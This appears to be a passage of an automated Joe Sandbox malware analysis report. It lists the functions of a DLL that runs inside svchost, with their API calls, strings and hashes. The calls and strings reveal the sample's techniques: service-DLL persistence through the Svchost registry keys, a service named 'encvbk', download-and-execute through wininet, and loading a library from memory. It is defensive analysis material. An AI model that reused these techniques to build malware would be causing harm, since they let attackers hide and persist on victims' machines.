                                                                                          • Opcode ID: 1d0c7509cf9b4937be937c3ffef0e8e5e866c158fea0c4347d35d9917c06a107
                                                                                          • Instruction ID: 34426b20c795a1564e6a7497d8f5fa3a22278249d6d1bd148d0ebd3529ec88d4
                                                                                          • Opcode Fuzzy Hash: 1d0c7509cf9b4937be937c3ffef0e8e5e866c158fea0c4347d35d9917c06a107
                                                                                          • Instruction Fuzzy Hash: 07112B76A045247FF200E7B0AD45FAF339ECB087D6F210026FA009605EEE756D0043A9
                                                                                          Function 10001E37 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 90stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 10001E3C
                                                                                          • wsprintfA.USER32 ref: 10001E7B
                                                                                            • Part of subcall function 10001B5B: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,?,00000000), ref: 10001B96
                                                                                            • Part of subcall function 10001B5B: _local_unwind2.MSVCRT ref: 10001BA9
                                                                                          • wsprintfA.USER32 ref: 10001EAE
                                                                                          • strlen.MSVCRT ref: 10001EBB
                                                                                            • Part of subcall function 10004A93: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,00000000,?), ref: 10004AC0
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 10004AD7
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10004AE2
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 10004AED
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10004AF8
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10004B03
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10004B0E
                                                                                            • Part of subcall function 10004A93: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 10004C02
                                                                                          • memset.MSVCRT ref: 10001EEE
                                                                                          • lstrcpyA.KERNEL32(?,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost), ref: 10001F02
                                                                                          • lstrlenA.KERNEL32(?,00000001), ref: 10001F0B
                                                                                            • Part of subcall function 10001A43: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,encvbk,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A54
                                                                                            • Part of subcall function 10001A43: OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A69
                                                                                            • Part of subcall function 10001A43: StartServiceA.ADVAPI32(00000000,00000000,00000000,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A7A
                                                                                            • Part of subcall function 10001A43: GetLastError.KERNEL32(?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A84
                                                                                            • Part of subcall function 10001A43: CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A92
                                                                                            • Part of subcall function 10001A43: CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001AC2
                                                                                          Strings
                                                                                          • ServiceDll, xrefs: 10001ED2
                                                                                          • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 10001EFC
                                                                                          • %%SystemRoot%%\System32\svchost.exe -k "%s", xrefs: 10001E6F
                                                                                          • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 10001EA8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Service$Open$CloseHandleLibraryManagerwsprintf$ErrorFreeH_prologLastLoadStart_local_unwind2lstrcpylstrlenmemsetstrlen
                                                                                          • String ID: %%SystemRoot%%\System32\svchost.exe -k "%s"$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                                                          • API String ID: 1573142492-3522277913
                                                                                          • Opcode ID: 0128ef592e1c99bbe64aa5232a117bdd0909c69419edbc971054f239723094cd
                                                                                          • Instruction ID: b0e3a08bed4d5a752cfc5ae4754fd9917613b9386cafdbad90e7966b10716f67
                                                                                          • Opcode Fuzzy Hash: 0128ef592e1c99bbe64aa5232a117bdd0909c69419edbc971054f239723094cd
                                                                                          • Instruction Fuzzy Hash: D9217EB290011CBBEB10DF94DC86EEF7B7DEB48780F104069FA08A2145EB715F558BA6
                                                                                          Function 10002F7B Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69sleepprocessCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 10001ACF: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10001ADF
                                                                                            • Part of subcall function 10001ACF: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10001AF5
                                                                                            • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B06
                                                                                            • Part of subcall function 10001ACF: ControlService.ADVAPI32(00000000,00000001,?), ref: 10001B1D
                                                                                            • Part of subcall function 10001ACF: Sleep.KERNEL32(0000000A), ref: 10001B2F
                                                                                            • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B3A
                                                                                            • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B43
                                                                                            • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B4A
                                                                                            • Part of subcall function 100020C8: GetModuleFileNameA.KERNEL32(?,00000104), ref: 100020E5
                                                                                            • Part of subcall function 100020C8: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100020F3
                                                                                            • Part of subcall function 100020C8: GetTickCount.KERNEL32 ref: 100020F9
                                                                                            • Part of subcall function 100020C8: wsprintfA.USER32 ref: 10002113
                                                                                            • Part of subcall function 100020C8: MoveFileA.KERNEL32(?,?), ref: 1000212A
                                                                                            • Part of subcall function 100020C8: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 1000213B
                                                                                          • wsprintfA.USER32 ref: 10002FC4
                                                                                          • CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10002FE7
                                                                                          • GetModuleFileNameA.KERNEL32(?,00000104), ref: 10002FFF
                                                                                          • GetFileAttributesA.KERNEL32(?), ref: 1000300C
                                                                                          • GetLastError.KERNEL32 ref: 10003018
                                                                                          • Sleep.KERNEL32(000003E8), ref: 10003028
                                                                                          • GetFileAttributesA.KERNEL32(?), ref: 10003035
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileService$AttributesCloseHandleModuleMoveNameOpenQuerySleepStatuswsprintf$ControlCountCreateDirectoryErrorLastManagerProcessSystemTick
                                                                                          • String ID: D$GUpdate%s$WinSta0\Default$encvbk
                                                                                          • API String ID: 3185690247-1238469715
                                                                                          • Opcode ID: 677340bbb3e7d3deb07a041f04dc4ca50ceeb01c397db1cab97bb9b2955d953d
                                                                                          • Instruction ID: ebf8a919204883b3cf295611002b4e487a781f5c3db184b4aeea1269bd5b3cbf
                                                                                          • Opcode Fuzzy Hash: 677340bbb3e7d3deb07a041f04dc4ca50ceeb01c397db1cab97bb9b2955d953d
                                                                                          • Instruction Fuzzy Hash: EB11B672401269AFFB11DBA0CC45EDF37BEFF09381F204051F506E2098DBB49A088BA1
                                                                                          Function 1000473F Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderstringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 10004750
                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 10004764
                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 1000476E
                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 10004779
                                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 100047B1
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 100047D0
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 100047DB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$CloseFreeHandleLoadlstrcmpi
                                                                                          • String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
                                                                                          • API String ID: 1314729832-4285911020
                                                                                          • Opcode ID: edd1cf7752d3c0a317ed2cc814c912f2b541baf62ab1e742b5b3ac3e1cc50ead
                                                                                          • Instruction ID: 62e2a4d820bdf17ee503cc2422b7b88c1aaff87933f8729642c2e5364a3b347a
                                                                                          • Opcode Fuzzy Hash: edd1cf7752d3c0a317ed2cc814c912f2b541baf62ab1e742b5b3ac3e1cc50ead
                                                                                          • Instruction Fuzzy Hash: F3115E71D01228ABFB10DB618C88FEEBBF8EF497C1F110095E904E2144DB75AA408AA4
                                                                                          Function 10003B9E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?,?,?,?,1000397D), ref: 10003BC4
                                                                                          • GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 10003BD3
                                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,1000397D), ref: 10003C0D
                                                                                          • realloc.MSVCRT ref: 10003C2C
                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 10003C85
                                                                                          • FreeLibrary.KERNEL32(?,1000397D), ref: 10003CC7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressLoadProc$Freerealloc
                                                                                          • String ID: IsBadReadPtr$kernel32.dll
                                                                                          • API String ID: 343009874-2271619998
                                                                                          • Opcode ID: 449202d9bcd9b40c7640628575b91c895d67466b70a0093317474b01c75d12b5
                                                                                          • Instruction ID: afc84e2e1f51588ee312ba66ad041d110bb41dc23133337ce681a0c6c223f4ac
                                                                                          • Opcode Fuzzy Hash: 449202d9bcd9b40c7640628575b91c895d67466b70a0093317474b01c75d12b5
                                                                                          • Instruction Fuzzy Hash: 45410571A0021AABFB51CF64C889B9EBBF8FF04395F118069E905E7259D735EE44CB90
                                                                                          Function 100029B6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(?,?,00000170), ref: 100029D2
                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 10002A05
                                                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10002A28
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 10002A3A
                                                                                          • strlen.MSVCRT ref: 10002A47
                                                                                          • wsprintfA.USER32 ref: 10002A6B
                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 10002A84
                                                                                            • Part of subcall function 100027BC: memset.MSVCRT ref: 100027D8
                                                                                            • Part of subcall function 100027BC: strrchr.MSVCRT ref: 100027E2
                                                                                            • Part of subcall function 100027BC: strrchr.MSVCRT ref: 10002811
                                                                                            • Part of subcall function 100027BC: strlen.MSVCRT ref: 10002821
                                                                                            • Part of subcall function 100027BC: strncpy.MSVCRT ref: 1000283B
                                                                                            • Part of subcall function 100027BC: memset.MSVCRT ref: 10002889
                                                                                            • Part of subcall function 100027BC: wsprintfA.USER32 ref: 100028A4
                                                                                            • Part of subcall function 100027BC: memset.MSVCRT ref: 100028B3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memset$Filestrlenstrrchrwsprintf$CloseCreateHandleWritelstrcpymemcpystrncpy
                                                                                          • String ID: %s %s
                                                                                          • API String ID: 3641787489-2939940506
                                                                                          • Opcode ID: 5a089fb692a77de50dca985f2a1d46a33a195534b01f1893c6a9a2dd3832bb26
                                                                                          • Instruction ID: 17f6a9bfa48d753ffad60fceaecdc7a51846e01dcf90a102910361a13764abaa
                                                                                          • Opcode Fuzzy Hash: 5a089fb692a77de50dca985f2a1d46a33a195534b01f1893c6a9a2dd3832bb26
                                                                                          • Instruction Fuzzy Hash: B5318972A001196FFB60DBA4CC89FDB73ACDB05395F104562F608E2085EF71AE44CB61
                                                                                          Function 10002C96 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 72stringprocessCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • strlen.MSVCRT ref: 10002C9F
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 10002CB3
                                                                                          • memcpy.MSVCRT(00000000,?,00000001,00000001), ref: 10002CBF
                                                                                          • strrchr.MSVCRT ref: 10002CC7
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10002D27
                                                                                            • Part of subcall function 10004529: LoadLibraryA.KERNEL32(wininet.dll,?,00000001,00000000), ref: 1000454D
                                                                                            • Part of subcall function 10004529: GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 10004564
                                                                                            • Part of subcall function 10004529: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 1000457E
                                                                                            • Part of subcall function 10004529: FreeLibrary.KERNEL32(00000000,?,00000001,00000000), ref: 1000459C
                                                                                            • Part of subcall function 1000248B: GetFileAttributesA.KERNEL32(00000001,10002CE8,00000001), ref: 1000248F
                                                                                            • Part of subcall function 1000248B: GetLastError.KERNEL32 ref: 1000249A
                                                                                          • CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10002D18
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$??2@??3@AttributesCreateErrorFileFreeLastLoadProcessmemcpystrlenstrrchr
                                                                                          • String ID: D$WinSta0\Default
                                                                                          • API String ID: 1737965409-1101385590
                                                                                          • Opcode ID: fdc65b0dcff99aff6c43371ba455fda07db6a1f497c56a226c9a0abe83cfdb15
                                                                                          • Instruction ID: 4c329e371b8b631c085a2e87808acd0a5feba54148e937fde04f6f1ec7f3be4b
                                                                                          • Opcode Fuzzy Hash: fdc65b0dcff99aff6c43371ba455fda07db6a1f497c56a226c9a0abe83cfdb15
                                                                                          • Instruction Fuzzy Hash: 6F01E1B75012286AFB01DBE49C45EDF77ACDF093D5F114422FE05E604ADEB49D0582E4
                                                                                          Function 10004467 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(user32.dll,?,?,00000000,?,00000000,Function_00004CE2,10005170,000000FF,?,100042CA,00000000), ref: 1000448F
                                                                                          • GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 100044A4
                                                                                          • GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 100044B0
                                                                                          • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 100044BC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                          • String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
                                                                                          • API String ID: 2238633743-3711086354
                                                                                          • Opcode ID: c36e72de9a328b3aed83568275539afdfd72128828bb5f39de00532976b64ac8
                                                                                          • Instruction ID: 34d8331da3f18528c44290a267cf2e76cab1e846e39b69c6303802ebf673ca42
                                                                                          • Opcode Fuzzy Hash: c36e72de9a328b3aed83568275539afdfd72128828bb5f39de00532976b64ac8
                                                                                          • Instruction Fuzzy Hash: A3116DB5D00229ABEB11DFA9CC44FDDBAF8FB0C790F214125F511F2254CB7158008BA4
                                                                                          Function 100023FA Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • printf.MSVCRT ref: 1000240A
                                                                                            • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038D8
                                                                                            • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038E8
                                                                                            • Part of subcall function 1000389D: GetProcessHeap.KERNEL32(00000000,00000014,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C), ref: 100038F9
                                                                                            • Part of subcall function 1000389D: HeapAlloc.KERNEL32(00000000,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C,?), ref: 10003900
                                                                                            • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003924
                                                                                            • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003933
                                                                                            • Part of subcall function 1000389D: memcpy.MSVCRT(00000000,?,?,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?), ref: 10003944
                                                                                          • OutputDebugStringA.KERNEL32(Can't load library from memory.,?,?,1000234E,?,10006E5C,?,00000000,00000000,?,?), ref: 10002421
                                                                                          • printf.MSVCRT ref: 1000244D
                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10002462
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual$Heapprintf$DebugFreeOutputProcessStringmemcpy
                                                                                          • String ID: Can't load library from memory.$LoadFromMemory $LoadFromMemory END---$PluginMe
                                                                                          • API String ID: 2530445704-2282109540
                                                                                          • Opcode ID: f0778e8a1c44c2343f6cf091ec4a36fe4ce25287fc1b95e6eb17d6c0cbbf42cd
                                                                                          • Instruction ID: 01af0e0ac1652a7321e0a293c3daa08a0af86dfdeaa3eab1b942b575fdefc638
                                                                                          • Opcode Fuzzy Hash: f0778e8a1c44c2343f6cf091ec4a36fe4ce25287fc1b95e6eb17d6c0cbbf42cd
                                                                                          • Instruction Fuzzy Hash: C3F09636100114BBFF02AF90DC05FDE3B75EB897E2F348015FA0455069CF72581597A1
                                                                                          Function 100020C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 36fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(?,00000104), ref: 100020E5
                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100020F3
                                                                                          • GetTickCount.KERNEL32 ref: 100020F9
                                                                                          • wsprintfA.USER32 ref: 10002113
                                                                                          • MoveFileA.KERNEL32(?,?), ref: 1000212A
                                                                                          • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 1000213B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
                                                                                          • String ID: %s\%d.bak
                                                                                          • API String ID: 830686190-2116986511
                                                                                          • Opcode ID: c8f7a2f9335d496cf424573f89800cf957bdb9276c51bc95e16fdfb109c3bf7e
                                                                                          • Instruction ID: c4293e3e21d6716b8372ba05ce181a3280e6ef40116a7aaffd0535516b57a778
                                                                                          • Opcode Fuzzy Hash: c8f7a2f9335d496cf424573f89800cf957bdb9276c51bc95e16fdfb109c3bf7e
                                                                                          • Instruction Fuzzy Hash: BEF0A4BA800278ABEB10EB94CDCDECB777DEB18785F100191F755D2065DAB59684CFA0
                                                                                          Function 1000366A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 35libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00000144,00000000,?,?,100037E0), ref: 10003676
                                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1000368E
                                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 10003698
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 100036AC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$FreeLoad
                                                                                          • String ID: GetCurrentProcess$IsWow64Process$kernel32.dll
                                                                                          • API String ID: 2256533930-2522683910
                                                                                          • Opcode ID: 34a6eaa16ec599896768d47b9751df638f2169115c1a8e10c5d2607526b1ef77
                                                                                          • Instruction ID: ef67112214a51d6d1f3e9f06108ff16868adfdb602b3d8d3b658392e0a076cbe
                                                                                          • Opcode Fuzzy Hash: 34a6eaa16ec599896768d47b9751df638f2169115c1a8e10c5d2607526b1ef77
                                                                                          • Instruction Fuzzy Hash: CBF0A072A00314BBF701D7E58C98DAF7BBCDB886D1B104019FA00A3208DB739D0189B5
                                                                                          Function 100021FF Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 161memorysleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000064), ref: 10002279
                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10002323
                                                                                          • memcpy.MSVCRT(00000000,?,?), ref: 10002336
                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10002371
                                                                                          • memcpy.MSVCRT(00000000,?,?), ref: 10002384
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
